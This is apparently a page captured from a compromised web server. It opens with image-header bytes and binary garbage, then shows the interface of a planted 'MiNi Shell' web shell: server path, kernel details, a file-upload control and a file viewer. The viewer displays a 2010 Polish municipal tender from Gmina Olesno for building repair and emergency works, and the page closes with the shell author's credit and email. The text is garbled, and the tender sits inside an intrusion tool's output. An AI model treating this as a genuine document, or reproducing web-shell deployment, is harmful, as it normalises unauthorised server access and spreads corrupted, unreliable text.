JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100825/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100825/229959-N-2010.html

<p class="kh_header"><b>Olesno: Wykonywanie bieżących robót remontowych i awaryjnych w budynkach komunalnych Gminy Olesno i jej jednostek organizacyjnych</b><br>
<b>Numer ogłoszenia: 229959 - 2010; data zamieszczenia: 25.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Olesna , ul. Pieloka 21, 46-300 Olesno, woj. opolskie, tel. 034 3597841-44 w. 204, faks 034 3597283.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.olesno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie bieżących robót remontowych i awaryjnych w budynkach komunalnych Gminy Olesno i jej jednostek organizacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w przetargu nieograniczonym są prace polegające na wykonywaniu bieżących robót remontowych i awaryjnych w budynkach komunalnych Gminy Olesno i jej jednostek organizacyjnych (zgodnie z załącznikiem nr 4 do specyfikacji) w zakresie:
	Zadanie częściowe nr 1
A.	instalacji i urządzeń wodnokanalizacyjnych, gazowych i c.o.
		Zadanie częściowe nr 2
B.	instalacji elektrycznej,  aparatury i urządzeń elektrycznych. 
Zadanie częściowe nr 3
C.	branży ogólnobudowlanej
Zadanie częściowe nr 4
D.	pokryć dachowych i obróbek blacharskich
Zadanie częściowe nr 5
E.	robót zduńskich.
	Prace należy wykonać zgodnie z ustaleniami Zamawiającego, obowiązującymi przepisami i normami dotyczącymi przedmiotu zamówienia.
	Czas podjęcia zlecenia:	
	- do 2 godzin - w przypadku robót awaryjnych zagrażających życiu ludzi lub katastrofą budowlaną
	- w pozostałych przypadkach na podstawie odrębnych uzgodnień z Zamawiającym jednak w terminie nie dłuższym niż 7 dni. 
	Wskaźnik kosztów transportu: 0%.
	Gwarancja: 24 miesiące.
	Wysokość marży na zakupione przez Wykonawcę materiały: 0%.
	Termin płatności za wykonanie zlecenia: nie dłuższy niż 14 dni od protokolarnego odbioru robót i przedłożenia faktury
	Wartość materiału użytego podczas zleconych prac rozliczana będzie na podstawie kserokopii faktur zakupu, wg cen zakupu oferowanych przez bezpośredniego sprzedawcę(hurtownia, producent) bez jakichkolwiek kosztów pośrednich i kosztów transportu. W tym zakresie Wykonawca będzie zobowiązany przedłożyć na każde żądanie Zamawiającego kserokopie faktur zakupu dotyczących określonego zakresu robót, wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.  
	Podstawę wyceny zleconych robót stanowić będą normy określone w stosownych katalogach nakładów rzeczowych KNR, lub godzinowe karty pracy, jeżeli będą tego wymagać okoliczności wykonywanego zlecenia.
	Zamawiający zastrzega sobie możliwość żądania od Wykonawcy - przed rozpoczęciem robót -  wykonania nieodpłatnie własnym kosztem i staraniem kosztorysu ofertowego, dotyczącego danego zlecenia.
	Zamawiający zastrzega sobie prawo ogłoszenia odrębnego zapytania ofertowego , w przypadku gdy jednorazowa wartość zamówienia może przekroczyć kwotę 10.000 złotych netto..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.10.00-0, 45.33.20.00-3, 45.33.30.00-0, 45.26.19.00-3, 71.31.50.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> (nie dotyczy)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o zasadę: spełnia / nie spełnia. Zamawiający nie wymaga żadnych dokumentów na potwierdzenie spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o zasadę: spełnia / nie spełnia. Zamawiający nie wymaga żadnych dokumentów na potwierdzenie spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o zasadę: spełnia / nie spełnia. Zamawiający nie wymaga żadnych dokumentów na potwierdzenie spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o zasadę: spełnia / nie spełnia.- 	warunek spełnią wykonawcy, którzy przedstawią wykaz osób uczestniczących w realizacji postępowania w tym imię i nazwisko osoby, która będzie pełnić funkcję kierownika budowy, wraz z jej uprawnieniami budowlanymi w specjalności konstrukcyjno-budowlanej oraz zaświadczeniem z właściwej izby samorządu zawodowego potwierdzającym jej przynależność do izby na dzień składania ofert lub innego dokumentu, z którego wynika przynależność do ww. izby (zadanie częściowe nr 1,2,3)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o zasadę: spełnia / nie spełnia. Zamawiający nie wymaga żadnych dokumentów na potwierdzenie spełnienia tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>4.	Formularz ofertowy
5.	Oświadczenie potwierdzające spełnianie warunków zawartych w art. 22 ust 1 ustawy.
6.	Pełnomocnictwo lub  zaświadczenia o wpisie do ewidencji lub wypis z krajowego rejestru sądowego (zgodnie z zapisami § 10 siwz).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotna zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany. Zmiany mogą dotyczyć:
a)	terminu wykonania robót,
b)	zmiany wynagrodzenia w przypadku zmiany  w  przepisach o podatkach,
c)	zmiany osób występujących po stornie Zamawiającego i Wykonawcy w przypadku wystąpienia zdarzeń losowych z tym że osoby występujące po stornie Wykonawcy muszą spełniać warunki udziału w postępowania,
2.	Niedopuszczalna jest pod rygorem nieważności zmiana postanowień zawartej umowy oraz wprowadzenie nowych postanowień do umowy niekorzystnych dla Zamawiającego, jeżeli przy ich uwzględnianiu należałoby zmienić treść oferty, na podstawie, której dokonano wyboru Wykonawcy, chyba, ze konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://olesno.biuletyn.info.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2010 godzina 11:30, miejsce: Siedziba Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> (nie dotyczy).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonywanie bieżących robót remontowych i awaryjnych w budynkach komunalnych Gminy Olesno i jej jednostek organizacyjnych w zakresie	instalacji i urządzeń wodnokanalizacyjnych, gazowych i c.o..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie bieżących prac konserwacyjnych i zabezpieczających instalacji i urządzeń sanitarnych wraz z koniecznymi robotami budowlanymi, wykonywanie usług naprawczych i remontowych instalacji wewnętrznych i zewnętrznych oraz wykonywanie prób szczelności, drożności przewodów instalacyjnych., usługi dotyczą instalacji wodociągowych, kanalizacyjnych, gazowych, c.o. i węzłów cieplnych, usuwanie ewentualnych awarii i ich skutków, zabezpieczenie doraźne instalacji, awaryjne czyszczenie odcinków kanalizacji deszczowej, udrażnianie wentylacji, regulacja wyłazów i kratek kanalizacyjnych, udział w rocznych przeglądach w zakresie sprawności i wartości użytkowej instalacji wod-kan, gazowej, c.o. zgodnie z obowiązującymi przepisami i normami z wyszczególnieniem braków i uszkodzeń, które mogłyby spowodować zagrożenia bezpieczeństwa w formie wytycznych do uwzględnienia w zaleceniach przeglądów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.33.20.00-3, 45.33.30.00-0, 71.31.50.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonywanie bieżących robót remontowych i awaryjnych w budynkach komunalnych Gminy Olesno i jej jednostek organizacyjnych w zakresie instalacji elektrycznej,  aparatury i urządzeń elektrycznych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wyszukiwanie przerwy w instalacji elektrycznej siły i światła, uszkodzeń tej instalacji i usuwanie ich skutków, wymianę urządzeń i aparatury kontrolno - pomiarowej, osprzętu elektrycznego i innych urządzeń integralnie związanych z instalacją siły i światła, usuwanie wszelkich możliwych uszkodzeń elektrycznych w urządzeniach i osprzęcie, przeprowadzenie na bieżąco kontroli sprawności działania urządzeń, osprzętu, aparatury i silników elektrycznych, naprawa oświetlenia zewnętrznego usytuowanego w obrębie nieruchomości komunalnych dokonywanie przeglądów i wymiany instalacji, osprzętu i urządzeń elektrycznych w zakresie:
 a) rozdzielni głównych, 
b) tablic rozdzielczych piętrowych, 
c) wewnętrznych linii zasilających, 
d) instalacji odbiorczych - WLZ mieszkaniowych wraz z tablicami licznikowymi, 
e) sprawności działania zainstalowanego osprzętu, opraw oświetleniowych, urządzeń grzewczych, 
f) instalacji oświetlenia administracyjnego, transformatorów bezpieczeństwa przy instalacjach 24V, 
g) sprawności działania automatów schodowych i zmierzchowych, 
h) instalacji elektrycznej automatyki c.w. i c.o., 
i) pomiarów spadków napięć w warunkach normalnych obciążeń, 
j) pomiarów ciągłości przewodów zerowych instalacji ochronnej, 
k) sprawdzenie stanu instalacji odbiorczych w poszczególnych lokalach celem podłączenia liczników energii elektrycznej przez Zakład Energetyczny, 
l) wymiana instalacji elektrycznych w lokalach mieszkalnych i użytkowych w części lub całości. 
Awaryjne naprawy instalacji elektrycznych w ramach całodobowego pogotowia mieszkaniowego: 
a) usunięcie zwarcia i naprawa instalacji, 
b) podłączenie upalonych przewodów i ich zaizolowanie, 
c) wymiana wkładki bezpiecznikowej lub główki bezpiecznikowej do 200A, 
d) wymiana - mostek, zacisk, wstawka dolna, 
e) demontaż tablicy bezpiecznikowej TG, TP wykonanie naprawy, ponowny montaż, 
f) rozplombowanie licznika, wykonanie naprawy lub wymiany tablicy licznikowej wraz ze zgłoszeniem do zaplombowania przez Zakład Energetyczny, 
g) wymiana gniazda tablicowego do 200A z demontażem i montażem tablicy, 
h) wymiana wyłącznika głównego wraz z wezwaniem Zakładu Energetycznego do wyłączenia i załączenia napięcia, 
i) wymiana puszki rozgałęźnej nadtynkowej i podtynkowej, 
j) wymiana listwy zaciskowej w tablicy TG i TP, 
k) wymiana wyłączników i przełączników schodowych, opraw oświetleniowych, 
l) uruchomienie i sprawdzenie instalacji budynku po załączeniu napięcia,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.10.00-0, 71.31.50.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonywanie bieżących robót remontowych i awaryjnych w budynkach komunalnych Gminy Olesno i jej jednostek organizacyjnych w zakresie	branży ogólnobudowlanej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie bieżących prac konserwacyjnych i zabezpieczeniowych, usług naprawczych, drobnych remontów, usuwanie ewentualnych awarii i ich skutków, zabezpieczenie doraźne obiektów, udział w rocznych przeglądach w zakresie sprawności i wartości użytkowej obiektów budowlanych zgodnie z obowiązującymi przepisami i normami, z wyszczególnieniem braków i uszkodzeń, które mogłyby spowodować zagrożenia bezpieczeństwa w formie wytycznych do uwzględnienia w zaleceniach przeglądów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 71.31.50.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonywanie bieżących robót remontowych i awaryjnych w budynkach komunalnych Gminy Olesno i jej jednostek organizacyjnych w zakresie pokryć dachowych i obróbek blacharskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie bieżących prac konserwacyjnych i zabezpieczeniowych, deskowanie ścian i połaci dachowej, pokrycia z blach fałdowych, pokrycia z papy i dachówki,  obróbki blacharskie, obróbki kominów, usług odśnieżania i oczyszczania fragmentów dachów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.26.19.00-3, 71.31.50.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonywanie bieżących robót remontowych i awaryjnych w budynkach komunalnych Gminy Olesno i jej jednostek organizacyjnych w zakresie robót zduńskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie bieżących prac konserwacyjnych i zabezpieczających, roboty związane z przeniesieniem pieca, postawieniem pieca kaflowego, rozebraniem pieca kaflowego oraz wszelkie roboty towarzyszące takie jak: szlifowanie krawędzi, wymiana kafli, wymiana cegły, dostarczenie materiałów: cegła pełna, cegła szamotowa, wstawienie drzwiczek itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 71.31.50.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com